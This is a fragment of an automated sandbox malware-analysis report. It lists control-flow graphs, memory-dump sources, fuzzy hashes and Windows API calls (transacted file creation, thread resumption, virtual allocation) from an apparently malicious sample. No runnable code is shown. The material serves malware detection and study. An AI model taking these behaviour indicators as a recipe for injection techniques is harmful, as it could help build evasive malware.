                                                        control_flow_graph 1342 7ffd345a585f-7ffd345a5872 1343 7ffd345a58be-7ffd345a58d4 1342->1343 1344 7ffd345a5874-7ffd345a5bb5 1342->1344 1346 7ffd345a58da-7ffd345a58e2 1343->1346 1347 7ffd345a5964-7ffd345a5994 1343->1347 1350 7ffd345a5bbf-7ffd345a5bfe 1344->1350 1349 7ffd345a58e8-7ffd345a58fa 1346->1349 1346->1350 1356 7ffd345a599a-7ffd345a599b 1347->1356 1357 7ffd345a5a3e-7ffd345a5a47 1347->1357 1349->1350 1351 7ffd345a5900-7ffd345a5917 1349->1351 1360 7ffd345a5c00 1350->1360 1353 7ffd345a5957-7ffd345a595e 1351->1353 1354 7ffd345a5919-7ffd345a5920 1351->1354 1353->1346 1353->1347 1354->1350 1358 7ffd345a5926-7ffd345a5954 1354->1358 1361 7ffd345a599e-7ffd345a59b4 1356->1361 1362 7ffd345a5a4d-7ffd345a5a53 1357->1362 1363 7ffd345a5b7f-7ffd345a5ba5 1357->1363 1358->1353 1366 7ffd345a5c0b-7ffd345a5ca1 1360->1366 1361->1350 1364 7ffd345a59ba-7ffd345a59de 1361->1364 1362->1350 1365 7ffd345a5a59-7ffd345a5a68 1362->1365 1367 7ffd345a59e0-7ffd345a5a03 1364->1367 1368 7ffd345a5a31-7ffd345a5a38 1364->1368 1369 7ffd345a5a6e-7ffd345a5a75 1365->1369 1370 7ffd345a5b72-7ffd345a5b79 1365->1370 1376 7ffd345a5c26-7ffd345a5ca6 1366->1376 1377 7ffd345a5cac-7ffd345a5cef 1366->1377 1367->1350 1378 7ffd345a5a09-7ffd345a5a2f 1367->1378 1368->1357 1368->1361 1369->1350 1371 7ffd345a5a7b-7ffd345a5a85 1369->1371 1370->1362 1370->1363 1375 7ffd345a5a8c-7ffd345a5a97 1371->1375 1379 7ffd345a5ad6-7ffd345a5ae5 1375->1379 1380 7ffd345a5a99-7ffd345a5ab0 1375->1380 1376->1377 1388 7ffd345a5c48-7ffd345a5ca8 1376->1388 1386 7ffd345a5cf1-7ffd345a5d1a 1377->1386 1378->1367 1378->1368 1379->1350 1384 7ffd345a5aeb-7ffd345a5b0f 1379->1384 1380->1350 1383 7ffd345a5ab6-7ffd345a5ad2 1380->1383 1383->1380 1387 7ffd345a5ad4 1383->1387 1389 7ffd345a5b12-7ffd345a5b2f 1384->1389 1398 7ffd345a5d1b-7ffd345a5d33 1386->1398 1391 7ffd345a5b52-7ffd345a5b68 1387->1391 1388->1377 1397 7ffd345a5c6c-7ffd345a5caa 1388->1397 1389->1350 1393 7ffd345a5b35-7ffd345a5b50 1389->1393 1391->1350 1394 7ffd345a5b6a-7ffd345a5b6e 1391->1394 1393->1389 1393->1391 1394->1370 1397->1377 1403 7ffd345a5c8d-7ffd345a5ca0 1397->1403 1402 7ffd345a5d35-7ffd345a5d46 call 7ffd345e7528 1398->1402 1406 7ffd345a5d51-7ffd345a5df7 1402->1406 1418 7ffd345a5f27-7ffd345a5f44 1406->1418 1419 7ffd345a5dfd-7ffd345a61a0 1406->1419 1421 7ffd345a5f4a-7ffd345a5f4f 1418->1421 1422 7ffd345a6251-7ffd345a62b8 1418->1422 1427 7ffd345a620e-7ffd345a6228 1419->1427 1423 7ffd345a5f52-7ffd345a5f59 1421->1423 1432 7ffd345a6428 1422->1432 1424 7ffd345a5edc-7ffd345a6249 1423->1424 1425 7ffd345a5f5b-7ffd345a5f5f 1423->1425 1424->1422 1425->1386 1428 7ffd345a5f65 1425->1428 1431 7ffd345a5fe3-7ffd345a5fe6 1428->1431 1433 7ffd345a5fe9-7ffd345a5ff0 1431->1433 1432->1432 1434 7ffd345a5ff6 1433->1434 1435 7ffd345a5f67-7ffd345a5f9c call 7ffd345a5bf0 1433->1435 1436 7ffd345a6066-7ffd345a606d 1434->1436 1435->1422 1443 7ffd345a5fa2-7ffd345a5fb2 1435->1443 1438 7ffd345a5ff8-7ffd345a602a call 7ffd345a5bf0 1436->1438 1439 7ffd345a606f-7ffd345a60b5 1436->1439 1438->1422 1446 7ffd345a6030-7ffd345a6058 1438->1446 1454 7ffd345a60bb-7ffd345a60c0 1439->1454 1455 7ffd345a5e84-7ffd345a5e88 1439->1455 1443->1386 1445 7ffd345a5fb8-7ffd345a5fd5 1443->1445 1445->1422 1448 7ffd345a5fdb-7ffd345a5fe0 1445->1448 1446->1422 1449 7ffd345a605e-7ffd345a6063 1446->1449 1448->1431 1449->1436 1458 7ffd345a6146-7ffd345a614a 1454->1458 1456 7ffd345a5eda 1455->1456 1457 7ffd345a5e8a-7ffd345a5ea7 1455->1457 1456->1423 1457->1427 1459 7ffd345a60c5-7ffd345a60f4 call 7ffd345a5bf0 1458->1459 1460 7ffd345a6150-7ffd345a6156 1458->1460 1459->1422 1463 7ffd345a60fa-7ffd345a610a 1459->1463 1463->1406 1464 7ffd345a6110-7ffd345a611f 1463->1464 1464->1422 1465 7ffd345a6125-7ffd345a6138 1464->1465 1465->1433 1466 7ffd345a613e-7ffd345a6143 1465->1466 1466->1458
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: hmY4
                                                        • API String ID: 0-3574876715
                                                        • Opcode ID: b2e2b7087dd195ee8154ac70cc252c3e50d2f06d1def7de7a74627dadc864e84
                                                        • Instruction ID: 5a593e5f03e7a4ced138b7c97f75386a87651ec9698649a41d19465d19c1573c
                                                        • Opcode Fuzzy Hash: b2e2b7087dd195ee8154ac70cc252c3e50d2f06d1def7de7a74627dadc864e84
                                                        • Instruction Fuzzy Hash: 6B529D30E1A6498FDB9ACF58C4E4AB97BB1FF55300F5445BDD54BCB286CA38A981CB40
                                                        Function 00007FFD343DEC5A Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 12353673c2d44fdf2439b59d5ce170c0881649180e952a1b82e5e3dce7d370dc
                                                        • Instruction ID: 75806b1cfade73c67054289a9738a01fca1a981f6a32194661e438aab171db03
                                                        • Opcode Fuzzy Hash: 12353673c2d44fdf2439b59d5ce170c0881649180e952a1b82e5e3dce7d370dc
                                                        • Instruction Fuzzy Hash: CF51C17090DA4C8FDB59EFA8D895AE9BFF0FB56310F00416BD04DD7292DA39A845CB41
                                                        Function 00007FFD343E3415 Relevance: .7, Instructions: 702COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b2c62019b8a389e66d2c05db01abaee9476fead8aa438c9456ced610b1a2afc
                                                        • Instruction ID: fc7d8189dc4294d4f8066e4cc71e5fa31aed5356489917a5a0e35808aee4dec3
                                                        • Opcode Fuzzy Hash: 8b2c62019b8a389e66d2c05db01abaee9476fead8aa438c9456ced610b1a2afc
                                                        • Instruction Fuzzy Hash: B4525870A0861D8FDB58DF54C4A0AFDB7B2FF59304F6081B9D04EA7286CB78A956DB40
                                                        Function 00007FFD349601F2 Relevance: .4, Instructions: 350COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b035f1d1241967728e1850bc81543b2b93360bcf52c3c4f15b7ba219d6e51fa
                                                        • Instruction ID: b4d55c8162ba9b3ecf716b071dee8943626daa8e08eb774e8530089a913870f3
                                                        • Opcode Fuzzy Hash: 0b035f1d1241967728e1850bc81543b2b93360bcf52c3c4f15b7ba219d6e51fa
                                                        • Instruction Fuzzy Hash: DCB1EA32A0E7D65FD722EB6C98E10EA7FA4DF0327471901BBC189CB093DE1E64469355
                                                        Function 00007FFD34965B7F Relevance: .2, Instructions: 244COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8134c6f332f08876ca4125a7c92077a483f3a3770285323fab39f69cab2268c
                                                        • Instruction ID: aa5ebfd987f9c9ed12ccfc47f5e9fe4c22a416bbdb079f690bf0b5daf2431d2a
                                                        • Opcode Fuzzy Hash: d8134c6f332f08876ca4125a7c92077a483f3a3770285323fab39f69cab2268c
                                                        • Instruction Fuzzy Hash: 9C71E422A0E6965FE792B7BCA8B10EA7BF4EF03335B1800BBC249C7093DD1D59469355
                                                        Function 00007FFD345AC100 Relevance: 1.9, Strings: 1, Instructions: 679COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1467 7ffd345ac100-7ffd345ac11a 1468 7ffd345ac71c-7ffd345ac740 1467->1468 1469 7ffd345ac120-7ffd345ac130 1467->1469 1470 7ffd345ac136-7ffd345ac171 1469->1470 1471 7ffd345ac77a-7ffd345ac790 1469->1471 1474 7ffd345ac20a-7ffd345ac212 1470->1474 1475 7ffd345ac7da-7ffd345ac7ed 1471->1475 1476 7ffd345ac792-7ffd345ac7b6 1471->1476 1477 7ffd345ac218 1474->1477 1478 7ffd345ac176-7ffd345ac17f 1474->1478 1480 7ffd345ac222-7ffd345ac23f 1477->1480 1478->1471 1479 7ffd345ac185-7ffd345ac190 1478->1479 1481 7ffd345ac196-7ffd345ac1aa 1479->1481 1482 7ffd345ac21a-7ffd345ac21e 1479->1482 1483 7ffd345ac246-7ffd345ac257 1480->1483 1484 7ffd345ac1ac-7ffd345ac1c3 1481->1484 1485 7ffd345ac203-7ffd345ac207 1481->1485 1482->1480 1490 7ffd345ac259-7ffd345ac26e 1483->1490 1491 7ffd345ac270-7ffd345ac27f 1483->1491 1484->1471 1486 7ffd345ac1c9-7ffd345ac1d5 1484->1486 1485->1474 1488 7ffd345ac1d7-7ffd345ac1eb 1486->1488 1489 7ffd345ac1ef-7ffd345ac200 1486->1489 1488->1484 1492 7ffd345ac1ed 1488->1492 1489->1485 1490->1491 1496 7ffd345ac2a1-7ffd345ac30e 1491->1496 1497 7ffd345ac281-7ffd345ac29c 1491->1497 1492->1485 1506 7ffd345ac35f-7ffd345ac3a6 1496->1506 1507 7ffd345ac310-7ffd345ac323 1496->1507 1503 7ffd345ac6d9-7ffd345ac70a 1497->1503 1512 7ffd345ac70c-7ffd345ac716 1503->1512 1514 7ffd345ac3aa-7ffd345ac3cb 1506->1514 1507->1471 1508 7ffd345ac329-7ffd345ac357 1507->1508 1516 7ffd345ac358-7ffd345ac35d 1508->1516 1512->1468 1512->1469 1519 7ffd345ac43c-7ffd345ac44d 1514->1519 1520 7ffd345ac3cd-7ffd345ac3d1 1514->1520 1516->1507 1518 7ffd345ac35e 1516->1518 1518->1506 1521 7ffd345ac44e-7ffd345ac451 1519->1521 1520->1516 1523 7ffd345ac3d3 1520->1523 1524 7ffd345ac457-7ffd345ac45b 1521->1524 1525 7ffd345ac3fc-7ffd345ac40d 1523->1525 1526 7ffd345ac45d-7ffd345ac45f 1524->1526 1525->1524 1534 7ffd345ac40f-7ffd345ac41d 1525->1534 1527 7ffd345ac4a9-7ffd345ac4b1 1526->1527 1528 7ffd345ac461-7ffd345ac46f 1526->1528 1532 7ffd345ac4fb-7ffd345ac503 1527->1532 1533 7ffd345ac4b3-7ffd345ac4bc 1527->1533 1530 7ffd345ac4e0-7ffd345ac4f5 1528->1530 1531 7ffd345ac471-7ffd345ac475 1528->1531 1530->1532 1531->1525 1541 7ffd345ac477 1531->1541 1536 7ffd345ac58b-7ffd345ac599 1532->1536 1537 7ffd345ac509-7ffd345ac522 1532->1537 1538 7ffd345ac4bf-7ffd345ac4c1 1533->1538 1539 7ffd345ac41f-7ffd345ac423 1534->1539 1540 7ffd345ac48e-7ffd345ac4a3 1534->1540 1542 7ffd345ac59b-7ffd345ac59d 1536->1542 1543 7ffd345ac60a-7ffd345ac60b 1536->1543 1537->1536 1544 7ffd345ac524-7ffd345ac525 1537->1544 1545 7ffd345ac4c3-7ffd345ac4c5 1538->1545 1546 7ffd345ac532-7ffd345ac534 1538->1546 1539->1514 1555 7ffd345ac425 1539->1555 1540->1527 1541->1540 1549 7ffd345ac619-7ffd345ac61b 1542->1549 1550 7ffd345ac59f 1542->1550 1548 7ffd345ac63b-7ffd345ac63d 1543->1548 1551 7ffd345ac526-7ffd345ac530 1544->1551 1553 7ffd345ac4c7 1545->1553 1554 7ffd345ac541-7ffd345ac545 1545->1554 1564 7ffd345ac535-7ffd345ac537 1546->1564 1557 7ffd345ac63f 1548->1557 1558 7ffd345ac6ae-7ffd345ac6d7 1548->1558 1561 7ffd345ac68c 1549->1561 1562 7ffd345ac61d-7ffd345ac61f 1549->1562 1550->1551 1563 7ffd345ac5a1 1550->1563 1551->1546 1553->1521 1556 7ffd345ac4c9 1553->1556 1559 7ffd345ac547 1554->1559 1560 7ffd345ac5c1-7ffd345ac5db 1554->1560 1555->1519 1565 7ffd345ac4ce-7ffd345ac4d4 1556->1565 1567 7ffd345ac65c-7ffd345ac66a 1557->1567 1558->1503 1559->1565 1568 7ffd345ac549 1559->1568 1594 7ffd345ac60d-7ffd345ac616 1560->1594 1595 7ffd345ac5dd-7ffd345ac5eb 1560->1595 1569 7ffd345ac6fd-7ffd345ac70a 1561->1569 1570 7ffd345ac68e-7ffd345ac690 1561->1570 1571 7ffd345ac69b-7ffd345ac69f 1562->1571 1572 7ffd345ac621 1562->1572 1573 7ffd345ac5a8-7ffd345ac5ac 1563->1573 1585 7ffd345ac5b8-7ffd345ac5c0 1564->1585 1586 7ffd345ac538 1564->1586 1578 7ffd345ac550-7ffd345ac575 1565->1578 1593 7ffd345ac4d6 1565->1593 1577 7ffd345ac66b-7ffd345ac675 1567->1577 1568->1578 1569->1512 1570->1512 1579 7ffd345ac692 1570->1579 1581 7ffd345ac71b 1571->1581 1582 7ffd345ac6a1 1571->1582 1572->1573 1580 7ffd345ac623 1572->1580 1583 7ffd345ac628-7ffd345ac62e 1573->1583 1584 7ffd345ac5ae 1573->1584 1588 7ffd345ac677-7ffd345ac68a 1577->1588 1604 7ffd345ac578-7ffd345ac589 1578->1604 1579->1549 1589 7ffd345ac694 1579->1589 1580->1583 1581->1468 1582->1583 1590 7ffd345ac6a3 1582->1590 1600 7ffd345ac6aa-7ffd345ac6ad 1583->1600 1601 7ffd345ac630 1583->1601 1584->1564 1591 7ffd345ac5b0 1584->1591 1585->1560 1586->1538 1587 7ffd345ac539-7ffd345ac53a 1586->1587 1587->1554 1588->1561 1589->1571 1590->1600 1591->1585 1593->1526 1597 7ffd345ac4d8 1593->1597 1594->1549 1595->1567 1598 7ffd345ac5ed-7ffd345ac5ef 1595->1598 1597->1530 1598->1577 1605 7ffd345ac5f1 1598->1605 1600->1558 1601->1588 1602 7ffd345ac632-7ffd345ac63a 1601->1602 1602->1548 1604->1536 1604->1544 1605->1604 1606 7ffd345ac5f3 1605->1606 1606->1543
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: a1_L
                                                        • API String ID: 0-3309210877
                                                        • Opcode ID: f3af1b0fcd824b040f342b7f203326a472eb91b576f8915676f6bace43ea48f9
                                                        • Instruction ID: f45431f642bb6893eb4d7fc7ce4d6b3fa2d7fedd9ae54b87c9255dc45f6369ce
                                                        • Opcode Fuzzy Hash: f3af1b0fcd824b040f342b7f203326a472eb91b576f8915676f6bace43ea48f9
                                                        • Instruction Fuzzy Hash: D9229730B09A1D8FDB9ADB1CC8A9A7977E1FF59311F5441B9D10EC7292DE28AC45CB80
                                                        Function 00007FFD343DD04A Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1607 7ffd343dd04a-7ffd343dd057 1608 7ffd343dd059-7ffd343dd061 1607->1608 1609 7ffd343dd062-7ffd343dd128 1607->1609 1608->1609 1613 7ffd343dd12a-7ffd343dd141 1609->1613 1614 7ffd343dd144-7ffd343dd266 CreateFileTransactedW 1609->1614 1613->1614 1615 7ffd343dd268 1614->1615 1616 7ffd343dd26e-7ffd343dd2f0 1614->1616 1615->1616
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: CreateFileTransacted
                                                        • String ID:
                                                        • API String ID: 2149338676-0
                                                        • Opcode ID: b65ea6610655b218566b2404f3d281191bd4b945ebf21833953ec974f75abba3
                                                        • Instruction ID: f27ac90f9826bed8447d1884223b09f213a9c4fc46043302dad64d9176b1af27
                                                        • Opcode Fuzzy Hash: b65ea6610655b218566b2404f3d281191bd4b945ebf21833953ec974f75abba3
                                                        • Instruction Fuzzy Hash: 5E912570909A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A984CB44
                                                        Function 00007FFD343DD2F5 Relevance: 1.7, APIs: 1, Instructions: 218fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 0f0355813052c81bf1276399254f0dade184392388953bac1d50a577be88c898
                                                        • Instruction ID: 8b0603dfb92ebb4c5766ff141dd4bfffbdd511c853a078babf1eacbc5571d996
                                                        • Opcode Fuzzy Hash: 0f0355813052c81bf1276399254f0dade184392388953bac1d50a577be88c898
                                                        • Instruction Fuzzy Hash: FF611470A08A5C8FDB98DF58C895BE9BBF1FB6A310F1041AED04DE3251DB75A985CB40
                                                        Function 00007FFD345A68A1 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: x3D4
                                                        • API String ID: 0-474182162
                                                        • Opcode ID: 9b11a8d1560b1fe55df6825243902acb6fb460e04c7e1dc2b47ff86c3b1b726b
                                                        • Instruction ID: 448f433acb5158c3072ef225fef1882310ef26bad9b44a362e90f244f10dd421
                                                        • Opcode Fuzzy Hash: 9b11a8d1560b1fe55df6825243902acb6fb460e04c7e1dc2b47ff86c3b1b726b
                                                        • Instruction Fuzzy Hash: 9BD1DD30A0FB468FE3ABDB28D4A45757BE1FF46304B10457EC18AC36E2DA2DB8469741
                                                        Function 00007FFD34440897 Relevance: 1.7, APIs: 1, Instructions: 152threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: b15f0d2be38d260a456d8aafc64021e98bf595e80c28f317c0133af9c6bbca38
                                                        • Instruction ID: b0834e8bc42ed98a07502b293b51f67be5ff77531f912ff1574467d8b2a65448
                                                        • Opcode Fuzzy Hash: b15f0d2be38d260a456d8aafc64021e98bf595e80c28f317c0133af9c6bbca38
                                                        • Instruction Fuzzy Hash: A0413A70E08A1C8FEB54EF98D895AEDBBF0FB5A310F10416AD40DE7252DA75A855CB40
                                                        Function 00007FFD343DEC91 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 24c0050355e319a013aa00a681cfd646617b5a191bdc727c202e695b420a159a
                                                        • Instruction ID: c68269311d96e790fdfbb7fd72895621ead6c7a972f23c0f9ce7cd6ff4797ff2
                                                        • Opcode Fuzzy Hash: 24c0050355e319a013aa00a681cfd646617b5a191bdc727c202e695b420a159a
                                                        • Instruction Fuzzy Hash: 1B418E7090DA8C8FDB59EFA8D899BE9BFF0EB56310F0441ABD04DD7292CA355845CB41
                                                        Function 00007FFD345ABEEB Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hh4
                                                        • API String ID: 0-4232732473
                                                        • Opcode ID: bf18da40896bf55671aaa86c06a646b05f568fe380faabbc3254389558137f40
                                                        • Instruction ID: feff8c2801aec0d18dc9b2076763985c1e6b40006712b1279c03f50fb56d090d
                                                        • Opcode Fuzzy Hash: bf18da40896bf55671aaa86c06a646b05f568fe380faabbc3254389558137f40
                                                        • Instruction Fuzzy Hash: 8171B630E2D64A8FEBA7DB6884A56BC7BA1FF46300F1405BAD20ED71D2DE2C6841D751
                                                        Function 00007FFD345A7829 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 86d4
                                                        • API String ID: 0-337169510
                                                        • Opcode ID: fbbaf4d598ac029b1843d970dc5fbc4ad4b68b57ef93b8cdb910b4dbc0edbdb2
                                                        • Instruction ID: e466c32aab3ae8854a0ada6d2cb8ca9266d840a7c67c6d2b785bb337b59154c4
                                                        • Opcode Fuzzy Hash: fbbaf4d598ac029b1843d970dc5fbc4ad4b68b57ef93b8cdb910b4dbc0edbdb2
                                                        • Instruction Fuzzy Hash: 3C511331A0EB494FE797DA2898955707BE0EF57320B1502BEC189C71A3D929F847C781
                                                        Function 00007FFD343DF0F5 Relevance: 1.4, APIs: 1, Instructions: 195memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: aea899a46965fe861ee99ab99edefdfeaa2d4bfa32d66df9fde2edffb5aa8bed
                                                        • Instruction ID: 152ce1b554953ebf0781c4fa0b2ba005a7bf312e96eddec336cd2436947b77ba
                                                        • Opcode Fuzzy Hash: aea899a46965fe861ee99ab99edefdfeaa2d4bfa32d66df9fde2edffb5aa8bed
                                                        • Instruction Fuzzy Hash: 5D513A74908A4C8FDF58EF58C895BE9BBF0FB6A310F1042AAD04DE3251DB71A981CB41
                                                        Function 00007FFD345A5BF0 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: hmY4
                                                        • API String ID: 0-3574876715
                                                        • Opcode ID: e4d3bf14f72d602dba7edc3691ac6220ada2dc63e7448369a1b141457f315e79
                                                        • Instruction ID: 4c326924f3151bae9199c8fcfa02b3c2d594f52f9d0fddbb4e512a71225ce630
                                                        • Opcode Fuzzy Hash: e4d3bf14f72d602dba7edc3691ac6220ada2dc63e7448369a1b141457f315e79
                                                        • Instruction Fuzzy Hash: C3511321F2D55E4BEBEA9B5884B5AF87AF2FF52300F4441BAD14EC71C6CD2C6A809741
                                                        Function 00007FFD34968DF8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: a259cea26bf3fb10706be1967c1cfb4e58e9f44c05e9a8c5e471c0698a50dbe6
                                                        • Instruction ID: 3e481883bff864edf9f912f706679e8cf1a2e5713356eea08edd2dd0d82f33d2
                                                        • Opcode Fuzzy Hash: a259cea26bf3fb10706be1967c1cfb4e58e9f44c05e9a8c5e471c0698a50dbe6
                                                        • Instruction Fuzzy Hash: 71515C71E0960E9FDB59DB98C4A55BDB7B1FF5A320F1040BEC10AE7286CA3D6901DB60
                                                        Function 00007FFD349635D8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: ec9ff5c8bd7e815941ced299bd1d5604bd55cf0f725dbe1c1502021bd40434a7
                                                        • Instruction ID: cc864b83501aae05a0fba17d21ea1b547aadf54286f07a71bf1ee8a6357c4096
                                                        • Opcode Fuzzy Hash: ec9ff5c8bd7e815941ced299bd1d5604bd55cf0f725dbe1c1502021bd40434a7
                                                        • Instruction Fuzzy Hash: B1516971E0864A9FEB69DB98C4A55BDB7B1FF49324F1040BEC00AE7286CA3D6901DB50
                                                        Function 00007FFD345A55E8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: edee10dca659f6a0f48516ce657a6726f31e483ad41ed1c59d4154fa4ba53791
                                                        • Instruction ID: 8c8e613c68488561037b6011579e2cb5c8725a1314113cf34d3352e3f94f8f44
